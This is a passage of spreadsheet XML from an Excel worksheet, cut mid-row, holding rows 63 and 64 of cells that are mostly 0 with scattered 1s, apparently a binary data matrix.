        <v>0</v>
      </c>
      <c r="EH63">
        <v>0</v>
      </c>
      <c r="EI63">
        <v>0</v>
      </c>
      <c r="EJ63">
        <v>0</v>
      </c>
      <c r="EK63">
        <v>0</v>
      </c>
      <c r="EL63">
        <v>0</v>
      </c>
      <c r="EM63">
        <v>0</v>
      </c>
      <c r="EN63">
        <v>0</v>
      </c>
      <c r="EO63">
        <v>0</v>
      </c>
      <c r="EP63">
        <v>0</v>
      </c>
      <c r="EQ63">
        <v>0</v>
      </c>
      <c r="ER63">
        <v>0</v>
      </c>
      <c r="ES63">
        <v>0</v>
      </c>
      <c r="ET63">
        <v>0</v>
      </c>
      <c r="EU63">
        <v>0</v>
      </c>
      <c r="EV63">
        <v>0</v>
      </c>
      <c r="EW63">
        <v>1</v>
      </c>
      <c r="EX63">
        <v>0</v>
      </c>
      <c r="EY63">
        <v>0</v>
      </c>
      <c r="EZ63">
        <v>0</v>
      </c>
      <c r="FA63">
        <v>1</v>
      </c>
      <c r="FB63">
        <v>0</v>
      </c>
      <c r="FC63">
        <v>0</v>
      </c>
      <c r="FD63">
        <v>0</v>
      </c>
      <c r="FE63">
        <v>0</v>
      </c>
      <c r="FF63">
        <v>0</v>
      </c>
      <c r="FG63">
        <v>0</v>
      </c>
      <c r="FH63">
        <v>0</v>
      </c>
      <c r="FI63">
        <v>0</v>
      </c>
      <c r="FJ63">
        <v>0</v>
      </c>
      <c r="FK63">
        <v>0</v>
      </c>
      <c r="FL63">
        <v>0</v>
      </c>
      <c r="FM63">
        <v>0</v>
      </c>
      <c r="FN63">
        <v>0</v>
      </c>
      <c r="FO63">
        <v>0</v>
      </c>
      <c r="FP63">
        <v>0</v>
      </c>
      <c r="FQ63">
        <v>0</v>
      </c>
      <c r="FR63">
        <v>0</v>
      </c>
      <c r="FS63">
        <v>0</v>
      </c>
      <c r="FT63">
        <v>0</v>
      </c>
      <c r="FU63">
        <v>0</v>
      </c>
      <c r="FV63">
        <v>0</v>
      </c>
      <c r="FW63">
        <v>0</v>
      </c>
      <c r="FX63">
        <v>1</v>
      </c>
      <c r="FY63">
        <v>0</v>
      </c>
      <c r="FZ63">
        <v>0</v>
      </c>
      <c r="GA63">
        <v>0</v>
      </c>
      <c r="GB63">
        <v>0</v>
      </c>
      <c r="GC63">
        <v>0</v>
      </c>
      <c r="GD63">
        <v>0</v>
      </c>
      <c r="GE63">
        <v>1</v>
      </c>
      <c r="GF63">
        <v>1</v>
      </c>
      <c r="GG63">
        <v>0</v>
      </c>
      <c r="GH63">
        <v>0</v>
      </c>
      <c r="GI63">
        <v>0</v>
      </c>
      <c r="GJ63">
        <v>0</v>
      </c>
      <c r="GK63">
        <v>1</v>
      </c>
      <c r="GL63">
        <v>0</v>
      </c>
      <c r="GM63">
        <v>0</v>
      </c>
      <c r="GN63">
        <v>0</v>
      </c>
      <c r="GO63">
        <v>0</v>
      </c>
      <c r="GP63">
        <v>0</v>
      </c>
      <c r="GQ63">
        <v>0</v>
      </c>
      <c r="GR63">
        <v>0</v>
      </c>
      <c r="GS63">
        <v>0</v>
      </c>
      <c r="GT63">
        <v>0</v>
      </c>
      <c r="GU63">
        <v>1</v>
      </c>
      <c r="GV63">
        <v>0</v>
      </c>
      <c r="GW63">
        <v>0</v>
      </c>
      <c r="GX63">
        <v>1</v>
      </c>
      <c r="GY63">
        <v>0</v>
      </c>
      <c r="GZ63">
        <v>0</v>
      </c>
      <c r="HA63">
        <v>0</v>
      </c>
      <c r="HB63">
        <v>0</v>
      </c>
      <c r="HC63">
        <v>0</v>
      </c>
      <c r="HD63">
        <v>1</v>
      </c>
      <c r="HE63">
        <v>0</v>
      </c>
      <c r="HF63">
        <v>0</v>
      </c>
      <c r="HG63">
        <v>0</v>
      </c>
      <c r="HH63">
        <v>0</v>
      </c>
      <c r="HI63">
        <v>0</v>
      </c>
      <c r="HJ63">
        <v>0</v>
      </c>
      <c r="HK63">
        <v>0</v>
      </c>
      <c r="HL63">
        <v>0</v>
      </c>
      <c r="HM63">
        <v>0</v>
      </c>
      <c r="HN63">
        <v>1</v>
      </c>
      <c r="HO63">
        <v>0</v>
      </c>
      <c r="HP63">
        <v>0</v>
      </c>
      <c r="HQ63">
        <v>0</v>
      </c>
      <c r="HR63">
        <v>0</v>
      </c>
      <c r="HS63">
        <v>0</v>
      </c>
      <c r="HT63">
        <v>0</v>
      </c>
      <c r="HU63">
        <v>0</v>
      </c>
      <c r="HV63">
        <v>0</v>
      </c>
      <c r="HW63">
        <v>0</v>
      </c>
      <c r="HX63">
        <v>0</v>
      </c>
      <c r="HY63">
        <v>0</v>
      </c>
      <c r="HZ63">
        <v>0</v>
      </c>
      <c r="IA63">
        <v>0</v>
      </c>
      <c r="IB63">
        <v>0</v>
      </c>
      <c r="IC63">
        <v>0</v>
      </c>
      <c r="ID63">
        <v>0</v>
      </c>
      <c r="IE63">
        <v>0</v>
      </c>
      <c r="IF63">
        <v>0</v>
      </c>
      <c r="IG63">
        <v>0</v>
      </c>
      <c r="IH63">
        <v>0</v>
      </c>
      <c r="II63">
        <v>0</v>
      </c>
      <c r="IJ63">
        <v>0</v>
      </c>
      <c r="IK63">
        <v>0</v>
      </c>
      <c r="IL63">
        <v>0</v>
      </c>
      <c r="IM63">
        <v>0</v>
      </c>
      <c r="IN63">
        <v>0</v>
      </c>
      <c r="IO63">
        <v>1</v>
      </c>
      <c r="IP63">
        <v>0</v>
      </c>
      <c r="IQ63">
        <v>0</v>
      </c>
      <c r="IR63">
        <v>0</v>
      </c>
      <c r="IS63">
        <v>0</v>
      </c>
      <c r="IT63">
        <v>0</v>
      </c>
      <c r="IU63">
        <v>0</v>
      </c>
      <c r="IV63">
        <v>0</v>
      </c>
      <c r="IW63">
        <v>1</v>
      </c>
      <c r="IX63">
        <v>0</v>
      </c>
      <c r="IY63">
        <v>0</v>
      </c>
      <c r="IZ63">
        <v>0</v>
      </c>
      <c r="JA63">
        <v>1</v>
      </c>
      <c r="JB63">
        <v>0</v>
      </c>
      <c r="JC63">
        <v>0</v>
      </c>
      <c r="JD63">
        <v>0</v>
      </c>
      <c r="JE63">
        <v>0</v>
      </c>
      <c r="JF63">
        <v>0</v>
      </c>
      <c r="JG63">
        <v>1</v>
      </c>
      <c r="JH63">
        <v>0</v>
      </c>
      <c r="JI63">
        <v>0</v>
      </c>
      <c r="JJ63">
        <v>0</v>
      </c>
      <c r="JK63">
        <v>0</v>
      </c>
      <c r="JL63">
        <v>0</v>
      </c>
      <c r="JM63">
        <v>0</v>
      </c>
      <c r="JN63">
        <v>0</v>
      </c>
      <c r="JO63">
        <v>0</v>
      </c>
      <c r="JP63">
        <v>1</v>
      </c>
      <c r="JQ63">
        <v>0</v>
      </c>
      <c r="JR63">
        <v>0</v>
      </c>
      <c r="JS63">
        <v>0</v>
      </c>
      <c r="JT63">
        <v>0</v>
      </c>
      <c r="JU63">
        <v>0</v>
      </c>
      <c r="JV63">
        <v>0</v>
      </c>
      <c r="JW63">
        <v>0</v>
      </c>
      <c r="JX63">
        <v>0</v>
      </c>
      <c r="JY63">
        <v>0</v>
      </c>
      <c r="JZ63">
        <v>0</v>
      </c>
      <c r="KA63">
        <v>0</v>
      </c>
      <c r="KB63">
        <v>0</v>
      </c>
      <c r="KC63">
        <v>0</v>
      </c>
      <c r="KD63">
        <v>0</v>
      </c>
      <c r="KE63">
        <v>0</v>
      </c>
      <c r="KF63">
        <v>0</v>
      </c>
      <c r="KG63">
        <v>0</v>
      </c>
      <c r="KH63">
        <v>0</v>
      </c>
      <c r="KI63">
        <v>0</v>
      </c>
      <c r="KJ63">
        <v>0</v>
      </c>
      <c r="KK63">
        <v>0</v>
      </c>
      <c r="KL63">
        <v>0</v>
      </c>
      <c r="KM63">
        <v>0</v>
      </c>
      <c r="KN63">
        <v>0</v>
      </c>
      <c r="KO63">
        <v>0</v>
      </c>
      <c r="KP63">
        <v>0</v>
      </c>
      <c r="KQ63">
        <v>1</v>
      </c>
      <c r="KR63">
        <v>0</v>
      </c>
      <c r="KS63">
        <v>1</v>
      </c>
      <c r="KT63">
        <v>0</v>
      </c>
      <c r="KU63">
        <v>1</v>
      </c>
      <c r="KV63">
        <v>0</v>
      </c>
      <c r="KW63">
        <v>0</v>
      </c>
      <c r="KX63">
        <v>0</v>
      </c>
      <c r="KY63">
        <v>0</v>
      </c>
      <c r="KZ63">
        <v>0</v>
      </c>
      <c r="LA63">
        <v>0</v>
      </c>
      <c r="LB63">
        <v>1</v>
      </c>
      <c r="LC63">
        <v>0</v>
      </c>
      <c r="LD63">
        <v>0</v>
      </c>
      <c r="LE63">
        <v>0</v>
      </c>
      <c r="LF63">
        <v>0</v>
      </c>
      <c r="LG63">
        <v>0</v>
      </c>
      <c r="LH63">
        <v>0</v>
      </c>
      <c r="LI63">
        <v>0</v>
      </c>
      <c r="LJ63">
        <v>0</v>
      </c>
      <c r="LK63">
        <v>0</v>
      </c>
      <c r="LL63">
        <v>0</v>
      </c>
      <c r="LM63">
        <v>0</v>
      </c>
      <c r="LN63">
        <v>0</v>
      </c>
      <c r="LO63">
        <v>0</v>
      </c>
      <c r="LP63">
        <v>1</v>
      </c>
      <c r="LQ63">
        <v>0</v>
      </c>
      <c r="LR63">
        <v>0</v>
      </c>
      <c r="LS63">
        <v>0</v>
      </c>
      <c r="LT63">
        <v>0</v>
      </c>
      <c r="LU63">
        <v>0</v>
      </c>
      <c r="LV63">
        <v>0</v>
      </c>
      <c r="LW63">
        <v>0</v>
      </c>
      <c r="LX63">
        <v>1</v>
      </c>
      <c r="LY63">
        <v>0</v>
      </c>
      <c r="LZ63">
        <v>0</v>
      </c>
      <c r="MA63">
        <v>0</v>
      </c>
      <c r="MB63">
        <v>1</v>
      </c>
      <c r="MC63">
        <v>1</v>
      </c>
      <c r="MD63">
        <v>0</v>
      </c>
      <c r="ME63">
        <v>0</v>
      </c>
      <c r="MF63">
        <v>0</v>
      </c>
      <c r="MG63">
        <v>0</v>
      </c>
      <c r="MH63">
        <v>0</v>
      </c>
      <c r="MI63">
        <v>0</v>
      </c>
      <c r="MJ63">
        <v>0</v>
      </c>
      <c r="MK63">
        <v>0</v>
      </c>
      <c r="ML63">
        <v>0</v>
      </c>
      <c r="MM63">
        <v>0</v>
      </c>
      <c r="MN63">
        <v>0</v>
      </c>
      <c r="MO63">
        <v>0</v>
      </c>
      <c r="MP63">
        <v>0</v>
      </c>
      <c r="MQ63">
        <v>0</v>
      </c>
      <c r="MR63">
        <v>0</v>
      </c>
      <c r="MS63">
        <v>0</v>
      </c>
      <c r="MT63">
        <v>0</v>
      </c>
      <c r="MU63">
        <v>0</v>
      </c>
      <c r="MV63">
        <v>0</v>
      </c>
      <c r="MW63">
        <v>0</v>
      </c>
      <c r="MX63">
        <v>0</v>
      </c>
      <c r="MY63">
        <v>0</v>
      </c>
      <c r="MZ63">
        <v>0</v>
      </c>
      <c r="NA63">
        <v>0</v>
      </c>
      <c r="NB63">
        <v>0</v>
      </c>
      <c r="NC63">
        <v>0</v>
      </c>
      <c r="ND63">
        <v>0</v>
      </c>
      <c r="NE63">
        <v>1</v>
      </c>
      <c r="NF63">
        <v>0</v>
      </c>
      <c r="NG63">
        <v>0</v>
      </c>
      <c r="NH63">
        <v>0</v>
      </c>
      <c r="NI63">
        <v>0</v>
      </c>
      <c r="NJ63">
        <v>0</v>
      </c>
      <c r="NK63">
        <v>0</v>
      </c>
      <c r="NL63">
        <v>0</v>
      </c>
      <c r="NM63">
        <v>0</v>
      </c>
      <c r="NN63">
        <v>0</v>
      </c>
      <c r="NO63">
        <v>0</v>
      </c>
      <c r="NP63">
        <v>1</v>
      </c>
      <c r="NQ63">
        <v>0</v>
      </c>
      <c r="NR63">
        <v>0</v>
      </c>
      <c r="NS63">
        <v>1</v>
      </c>
      <c r="NT63">
        <v>0</v>
      </c>
      <c r="NU63">
        <v>0</v>
      </c>
      <c r="NV63">
        <v>1</v>
      </c>
      <c r="NW63">
        <v>0</v>
      </c>
      <c r="NX63">
        <v>1</v>
      </c>
      <c r="NY63">
        <v>0</v>
      </c>
      <c r="NZ63">
        <v>0</v>
      </c>
      <c r="OA63">
        <v>0</v>
      </c>
      <c r="OB63">
        <v>0</v>
      </c>
      <c r="OC63">
        <v>0</v>
      </c>
      <c r="OD63">
        <v>0</v>
      </c>
      <c r="OE63">
        <v>0</v>
      </c>
      <c r="OF63">
        <v>0</v>
      </c>
      <c r="OG63">
        <v>0</v>
      </c>
      <c r="OH63">
        <v>0</v>
      </c>
      <c r="OI63">
        <v>0</v>
      </c>
      <c r="OJ63">
        <v>0</v>
      </c>
      <c r="OK63">
        <v>1</v>
      </c>
      <c r="OL63">
        <v>1</v>
      </c>
      <c r="OM63">
        <v>0</v>
      </c>
      <c r="ON63">
        <v>0</v>
      </c>
      <c r="OO63">
        <v>0</v>
      </c>
      <c r="OP63">
        <v>0</v>
      </c>
      <c r="OQ63">
        <v>0</v>
      </c>
      <c r="OR63">
        <v>0</v>
      </c>
      <c r="OS63">
        <v>1</v>
      </c>
      <c r="OT63">
        <v>1</v>
      </c>
      <c r="OU63">
        <v>0</v>
      </c>
      <c r="OV63">
        <v>0</v>
      </c>
      <c r="OW63">
        <v>0</v>
      </c>
      <c r="OX63">
        <v>0</v>
      </c>
      <c r="OY63">
        <v>1</v>
      </c>
      <c r="OZ63">
        <v>0</v>
      </c>
      <c r="PA63">
        <v>0</v>
      </c>
      <c r="PB63">
        <v>0</v>
      </c>
      <c r="PC63">
        <v>0</v>
      </c>
      <c r="PD63">
        <v>1</v>
      </c>
      <c r="PE63">
        <v>0</v>
      </c>
      <c r="PF63">
        <v>1</v>
      </c>
      <c r="PG63">
        <v>0</v>
      </c>
      <c r="PH63">
        <v>0</v>
      </c>
      <c r="PI63">
        <v>0</v>
      </c>
      <c r="PJ63">
        <v>0</v>
      </c>
      <c r="PK63">
        <v>0</v>
      </c>
      <c r="PL63">
        <v>0</v>
      </c>
      <c r="PM63">
        <v>0</v>
      </c>
      <c r="PN63">
        <v>0</v>
      </c>
      <c r="PO63">
        <v>0</v>
      </c>
      <c r="PP63">
        <v>0</v>
      </c>
      <c r="PQ63">
        <v>0</v>
      </c>
      <c r="PR63">
        <v>1</v>
      </c>
      <c r="PS63">
        <v>0</v>
      </c>
      <c r="PT63">
        <v>0</v>
      </c>
      <c r="PU63">
        <v>0</v>
      </c>
      <c r="PV63">
        <v>0</v>
      </c>
      <c r="PW63">
        <v>1</v>
      </c>
      <c r="PX63">
        <v>0</v>
      </c>
      <c r="PY63">
        <v>0</v>
      </c>
      <c r="PZ63">
        <v>0</v>
      </c>
      <c r="QA63">
        <v>1</v>
      </c>
      <c r="QB63">
        <v>0</v>
      </c>
      <c r="QC63">
        <v>0</v>
      </c>
      <c r="QD63">
        <v>0</v>
      </c>
      <c r="QE63">
        <v>1</v>
      </c>
      <c r="QF63">
        <v>0</v>
      </c>
      <c r="QG63">
        <v>0</v>
      </c>
      <c r="QH63">
        <v>0</v>
      </c>
      <c r="QI63">
        <v>0</v>
      </c>
      <c r="QJ63">
        <v>1</v>
      </c>
      <c r="QK63">
        <v>0</v>
      </c>
      <c r="QL63">
        <v>1</v>
      </c>
      <c r="QM63">
        <v>0</v>
      </c>
      <c r="QN63">
        <v>0</v>
      </c>
      <c r="QO63">
        <v>0</v>
      </c>
      <c r="QP63">
        <v>0</v>
      </c>
      <c r="QQ63">
        <v>0</v>
      </c>
      <c r="QR63">
        <v>1</v>
      </c>
      <c r="QS63">
        <v>0</v>
      </c>
      <c r="QT63">
        <v>1</v>
      </c>
      <c r="QU63">
        <v>0</v>
      </c>
      <c r="QV63">
        <v>0</v>
      </c>
      <c r="QW63">
        <v>1</v>
      </c>
      <c r="QX63">
        <v>0</v>
      </c>
      <c r="QY63">
        <v>0</v>
      </c>
      <c r="QZ63">
        <v>0</v>
      </c>
      <c r="RA63">
        <v>0</v>
      </c>
      <c r="RB63">
        <v>0</v>
      </c>
      <c r="RC63">
        <v>0</v>
      </c>
      <c r="RD63">
        <v>0</v>
      </c>
      <c r="RE63">
        <v>0</v>
      </c>
      <c r="RF63">
        <v>1</v>
      </c>
      <c r="RG63">
        <v>0</v>
      </c>
      <c r="RH63">
        <v>1</v>
      </c>
      <c r="RI63">
        <v>0</v>
      </c>
      <c r="RJ63">
        <v>0</v>
      </c>
      <c r="RK63">
        <v>0</v>
      </c>
      <c r="RL63">
        <v>0</v>
      </c>
      <c r="RM63">
        <v>0</v>
      </c>
      <c r="RN63">
        <v>0</v>
      </c>
      <c r="RO63">
        <v>0</v>
      </c>
      <c r="RP63">
        <v>0</v>
      </c>
      <c r="RQ63">
        <v>0</v>
      </c>
      <c r="RR63">
        <v>0</v>
      </c>
      <c r="RS63">
        <v>0</v>
      </c>
      <c r="RT63">
        <v>0</v>
      </c>
      <c r="RU63">
        <v>0</v>
      </c>
      <c r="RV63">
        <v>0</v>
      </c>
      <c r="RW63">
        <v>0</v>
      </c>
      <c r="RX63">
        <v>0</v>
      </c>
      <c r="RY63">
        <v>0</v>
      </c>
      <c r="RZ63">
        <v>0</v>
      </c>
      <c r="SA63">
        <v>1</v>
      </c>
    </row>
    <row r="64" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A64" s="6" t="s">
        <v>3123</v>
      </c>
      <c r="B64">
        <v>16</v>
      </c>
      <c r="C64">
        <v>0</v>
      </c>
      <c r="D64">
        <v>0</v>
      </c>
      <c r="E64">
        <v>0</v>
      </c>
      <c r="F64">
        <v>0</v>
      </c>
      <c r="G64">
        <v>0</v>
      </c>
      <c r="H64">
        <v>0</v>
      </c>
      <c r="I64">
        <v>1</v>
      </c>
      <c r="J64">
        <v>0</v>
      </c>
      <c r="K64">
        <v>0</v>
      </c>
      <c r="L64">
        <v>0</v>
      </c>
      <c r="M64">
        <v>0</v>
      </c>
      <c r="N64">
        <v>0</v>
      </c>
      <c r="O64">
        <v>1</v>
      </c>
      <c r="P64">
        <v>0</v>
      </c>
      <c r="Q64">
        <v>0</v>
      </c>
      <c r="R64">
        <v>0</v>
      </c>
      <c r="S64">
        <v>0</v>
      </c>
      <c r="T64">
        <v>0</v>
      </c>
      <c r="U64">
        <v>0</v>
      </c>
      <c r="V64">
        <v>0</v>
      </c>
      <c r="W64">
        <v>0</v>
      </c>
      <c r="X64">
        <v>0</v>
      </c>
      <c r="Y64">
        <v>0</v>
      </c>
      <c r="Z64">
        <v>0</v>
      </c>
      <c r="AA64">
        <v>0</v>
      </c>
      <c r="AB64">
        <v>0</v>
      </c>
      <c r="AC64">
        <v>0</v>
      </c>
      <c r="AD64">
        <v>0</v>
      </c>
      <c r="AE64">
        <v>0</v>
      </c>
      <c r="AF64">
        <v>0</v>
      </c>
      <c r="AG64">
        <v>0</v>
      </c>
      <c r="AH64">
        <v>0</v>
      </c>
      <c r="AI64">
        <v>0</v>
      </c>
      <c r="AJ64">
        <v>0</v>
      </c>
      <c r="AK64">
        <v>0</v>
      </c>
      <c r="AL64">
        <v>0</v>
      </c>
      <c r="AM64">
        <v>0</v>
      </c>
      <c r="AN64">
        <v>0</v>
      </c>
      <c r="AO64">
        <v>0</v>
      </c>
      <c r="AP64">
        <v>0</v>
      </c>
      <c r="AQ64">
        <v>0</v>
      </c>
      <c r="AR64">
        <v>0</v>
      </c>
      <c r="AS64">
        <v>0</v>
      </c>
      <c r="AT64">
        <v>0</v>
      </c>
      <c r="AU64">
        <v>0</v>
      </c>
      <c r="AV64">
        <v>0</v>
      </c>
      <c r="AW64">
        <v>0</v>
      </c>
      <c r="AX64">
        <v>0</v>
      </c>
      <c r="AY64">
        <v>0</v>
      </c>
      <c r="AZ64">
        <v>0</v>
      </c>
      <c r="BA64">
        <v>0</v>
      </c>
      <c r="BB64">
        <v>0</v>
      </c>
      <c r="BC64">
        <v>0</v>
      </c>
      <c r="BD64">
        <v>0</v>
      </c>
      <c r="BE64">
        <v>0</v>
      </c>
      <c r="BF64">
        <v>0</v>
      </c>
      <c r="BG64">
        <v>0</v>
      </c>
      <c r="BH64">
        <v>0</v>
      </c>
      <c r="BI64">
        <v>0</v>
      </c>
      <c r="BJ64">
        <v>0</v>
      </c>
      <c r="BK64">
        <v>0</v>
      </c>
      <c r="BL64">
        <v>0</v>
      </c>
      <c r="BM64">
        <v>0</v>
      </c>
      <c r="BN64">
        <v>1</v>
      </c>
      <c r="BO64">
        <v>0</v>
      </c>
      <c r="BP64">
        <v>0</v>
      </c>
      <c r="BQ64">
        <v>0</v>
      </c>
      <c r="BR64">
        <v>0</v>
      </c>
      <c r="BS64">
        <v>0</v>
      </c>
      <c r="BT64">
        <v>0</v>
      </c>
      <c r="BU64">
        <v>0</v>
      </c>
      <c r="BV64">
        <v>0</v>
      </c>
      <c r="BW64">
        <v>0</v>
      </c>
      <c r="BX64">
        <v>0</v>
      </c>
      <c r="BY64">
        <v>0</v>
      </c>
      <c r="BZ64">
        <v>0</v>
      </c>
      <c r="CA64">
        <v>0</v>
      </c>
      <c r="CB64">
        <v>0</v>
      </c>
      <c r="CC64">
        <v>0</v>
      </c>
      <c r="CD64">
        <v>0</v>
      </c>
      <c r="CE64">
        <v>0</v>
      </c>
      <c r="CF64">
        <v>1</v>
      </c>
      <c r="CG64">
        <v>0</v>
      </c>
      <c r="CH64">
        <v>0</v>
      </c>
      <c r="CI64">
        <v>0</v>
      </c>
      <c r="CJ64">
        <v>0</v>
      </c>
      <c r="CK64">
        <v>0</v>
      </c>
      <c r="CL64">
        <v>0</v>
      </c>
      <c r="CM64">
        <v>0</v>
      </c>
      <c r="CN64">
        <v>0</v>
      </c>
      <c r="CO64">
        <v>0</v>
      </c>
      <c r="CP64">
        <v>0</v>
      </c>
      <c r="CQ64">
        <v>0</v>
      </c>
      <c r="CR64">
        <v>0</v>
      </c>
      <c r="CS64">
        <v>0</v>
      </c>
      <c r="CT64">
        <v>0</v>
      </c>
      <c r="CU64">
        <v>0</v>
      </c>
      <c r="CV64">
        <v>0</v>
      </c>
      <c r="CW64">
        <v>0</v>
      </c>
      <c r="CX64">
        <v>0</v>
      </c>
      <c r="CY64">
        <v>0</v>
      </c>
      <c r="CZ64">
        <v>0</v>
      </c>
      <c r="DA64">
        <v>0</v>
      </c>
      <c r="DB64">
        <v>0</v>
      </c>
      <c r="DC64">
        <v>0</v>
      </c>
      <c r="DD64">
        <v>0</v>
      </c>
      <c r="DE64">
        <v>0</v>
      </c>
      <c r="DF64">
        <v>0</v>
      </c>
      <c r="DG64">
        <v>0</v>
      </c>
      <c r="DH64">
        <v>0</v>
      </c>
      <c r="DI64">
        <v>0</v>
      </c>
      <c r="DJ64">
        <v>0</v>
      </c>
      <c r="DK64">
        <v>0</v>
      </c>
      <c r="DL64">
        <v>0</v>
      </c>
      <c r="DM64">
        <v>0</v>
      </c>
      <c r="DN64">
        <v>0</v>
      </c>
      <c r="DO64">
        <v>0</v>
      </c>
      <c r="DP64">
        <v>0</v>
      </c>
      <c r="DQ64">
        <v>0</v>
      </c>
      <c r="DR64">
        <v>0</v>
      </c>
      <c r="DS64">
        <v>0</v>
      </c>
      <c r="DT64">
        <v>0</v>
      </c>
      <c r="DU64">
        <v>0</v>
      </c>
      <c r="DV64">
        <v>0</v>
      </c>
      <c r="DW64">
        <v>0</v>
      </c>
      <c r="DX64">
        <v>0</v>
      </c>
      <c r="DY64">
        <v>0</v>
      </c>
      <c r="DZ64">
        <v>0</v>
      </c>
      <c r="EA64">
        <v>0</v>
      </c>
      <c r="EB64">
        <v>0</v>
      </c>
      <c r="EC64">
        <v>0</v>
      </c>
      <c r="ED64">
        <v>0</v>
      </c>
      <c r="EE64">
        <v>0</v>
      </c>
      <c r="EF64">
        <v>0</v>
      </c>
      <c r="EG64">
        <v>0</v>
      </c>
      <c r="EH64">
        <v>0</v>
      </c>
      <c r="EI64">
        <v>0</v>
      </c>
      <c r="EJ64">
        <v>0</v>
      </c>
      <c r="EK64">
        <v>0</v>
      </c>
      <c r="EL64">
        <v>0</v>
      </c>
      <c r="EM64">
        <v>0</v>
      </c>
      <c r="EN64">
        <v>0</v>
      </c>
      <c r="EO64">
        <v>0</v>
      </c>
      <c r="EP64">
        <v>0</v>
      </c>
      <c r="EQ64">
        <v>0</v>
      </c>
      <c r="ER64">
        <v>0</v>
      </c>
      <c r="ES64">
        <v>0</v>
      </c>
      <c r="ET64">
        <v>0</v>
      </c>
      <c r="EU64">
        <v>0</v>
      </c>
      <c r="EV64">
        <v>0</v>
      </c>
      <c r="EW64">
        <v>0</v>
      </c>
      <c r="EX64">
        <v>0</v>
      </c>
      <c r="EY64">
        <v>0</v>
      </c>
      <c r="EZ64">
        <v>0</v>
      </c>
      <c r="FA64">
        <v>0</v>
      </c>
      <c r="FB64">
        <v>0</v>
      </c>
      <c r="FC64">
        <v>0</v>
      </c>
      <c r="FD64">
        <v>0</v>
      </c>
      <c r="FE64">
        <v>0</v>
      </c>
      <c r="FF64">
        <v>0</v>
      </c>
      <c r="FG64">
        <v>0</v>
      </c>
      <c r="FH64">
        <v>0</v>
      </c>
      <c r="FI64">
        <v>0</v>
      </c>
      <c r="FJ64">
        <v>0</v>
      </c>
      <c r="FK64">
        <v>0</v>
      </c>
      <c r="FL64">
        <v>0</v>
      </c>
      <c r="FM64">
        <v>0</v>
      </c>
      <c r="FN64">
        <v>0</v>
      </c>
      <c r="FO64">
        <v>0</v>
      </c>
      <c r="FP64">
        <v>0</v>
      </c>
      <c r="FQ64">
        <v>0</v>
      </c>
      <c r="FR64">
        <v>0</v>
      </c>
      <c r="FS64">
        <v>0</v>
      </c>
      <c r="FT64">
        <v>0</v>
      </c>
      <c r="FU64">
        <v>0</v>
      </c>
      <c r="FV64">
        <v>0</v>
      </c>
      <c r="FW64">
        <v>0</v>
      </c>
      <c r="FX64">
        <v>0</v>
      </c>
      <c r="FY64">
        <v>0</v>
      </c>
      <c r="FZ64">
        <v>0</v>
      </c>
      <c r="GA64">
        <v>0</v>
      </c>
      <c r="GB64">
        <v>0</v>
      </c>
      <c r="GC64">
        <v>0</v>
      </c>
      <c r="GD64">
        <v>0</v>
      </c>
      <c r="GE64">
        <v>0</v>
      </c>
      <c r="GF64">
        <v>0</v>
      </c>
      <c r="GG64">
        <v>0</v>
      </c>
      <c r="GH64">
        <v>0</v>
      </c>
      <c r="GI64">
        <v>0</v>
      </c>
      <c r="GJ64">
        <v>0</v>
      </c>
      <c r="GK64">
        <v>0</v>
      </c>
      <c r="GL64">
        <v>0</v>
      </c>
      <c r="GM64">
        <v>0</v>
      </c>
      <c r="GN64">
        <v>0</v>
      </c>
      <c r="GO64">
        <v>0</v>
      </c>
      <c r="GP64">
        <v>0</v>
      </c>
      <c r="GQ64">
        <v>1</v>
      </c>
      <c r="GR64">
        <v>0</v>
      </c>
      <c r="GS64">
        <v>0</v>
      </c>
      <c r="GT64">
        <v>0</v>
      </c>
      <c r="GU64">
        <v>0</v>
      </c>
      <c r="GV64">
        <v>0</v>
      </c>
      <c r="GW64">
        <v>0</v>
      </c>
      <c r="GX64">
        <v>0</v>
      </c>
      <c r="GY64">
        <v>0</v>
      </c>
      <c r="GZ64">
        <v>0</v>
      </c>
      <c r="HA64">
        <v>0</v>
      </c>
      <c r="HB64">
        <v>0</v>
      </c>
      <c r="HC64">
        <v>0</v>
      </c>
      <c r="HD64">
        <v>0</v>
      </c>
      <c r="HE64">
        <v>0</v>
      </c>
      <c r="HF64">
        <v>1</v>
      </c>
      <c r="HG64">
        <v>0</v>
      </c>
      <c r="HH64">
        <v>0</v>
      </c>
      <c r="HI64">
        <v>0</v>
      </c>
      <c r="HJ64">
        <v>0</v>
      </c>
      <c r="HK64">
        <v>0</v>
      </c>
      <c r="HL64">
        <v>1</v>
      </c>
      <c r="HM64">
        <v>0</v>
      </c>
      <c r="HN64">
        <v>0</v>
      </c>
      <c r="HO64">
        <v>0</v>
      </c>
      <c r="HP64">
        <v>0</v>
      </c>
      <c r="HQ64">
        <v>0</v>
      </c>
      <c r="HR64">
        <v>0</v>
      </c>
      <c r="HS64">
        <v>0</v>
      </c>
      <c r="HT64">
        <v>0</v>
      </c>
      <c r="HU64">
        <v>0</v>
      </c>
      <c r="HV64">
        <v>0</v>
      </c>
      <c r="HW64">
        <v>0</v>
      </c>
      <c r="HX64">
        <v>1</v>
      </c>
      <c r="HY64">
        <v>0</v>
      </c>
      <c r="HZ64">
        <v>0</v>
      </c>
      <c r="IA64">
        <v>0</v>
      </c>
      <c r="IB64">
        <v>0</v>
      </c>
      <c r="IC64">
        <v>0</v>
      </c>
      <c r="ID64">
        <v>0</v>
      </c>
      <c r="IE64">
        <v>0</v>
      </c>
      <c r="IF64">
        <v>1</v>
      </c>
      <c r="IG64">
        <v>0</v>
      </c>
      <c r="IH64">
        <v>0</v>
      </c>
      <c r="II64">
        <v>0</v>
      </c>
      <c r="IJ64">
        <v>0</v>
      </c>
      <c r="IK64">
        <v>0</v>
      </c>
      <c r="IL64">
        <v>0</v>
      </c>
      <c r="IM64">
        <v>0</v>
      </c>
      <c r="IN64">
        <v>0</v>
      </c>
      <c r="IO64">
        <v>0</v>
      </c>
      <c r="IP64">
        <v>0</v>
      </c>
      <c r="IQ64">
        <v>0</v>
      </c>
      <c r="IR64">
        <v>0</v>
      </c>
      <c r="IS64">
        <v>0</v>
      </c>
      <c r="IT64">
        <v>0</v>
      </c>
      <c r="IU64">
        <v>1</v>
      </c>
      <c r="IV64">
        <v>0</v>
      </c>
      <c r="IW64">
        <v>0</v>
      </c>
      <c r="IX64">
        <v>0</v>
      </c>
      <c r="IY64">
        <v>0</v>
      </c>
      <c r="IZ64">
        <v>0</v>
      </c>
      <c r="JA64">
        <v>0</v>
      </c>
      <c r="JB64">
        <v>0</v>
      </c>
      <c r="JC64">
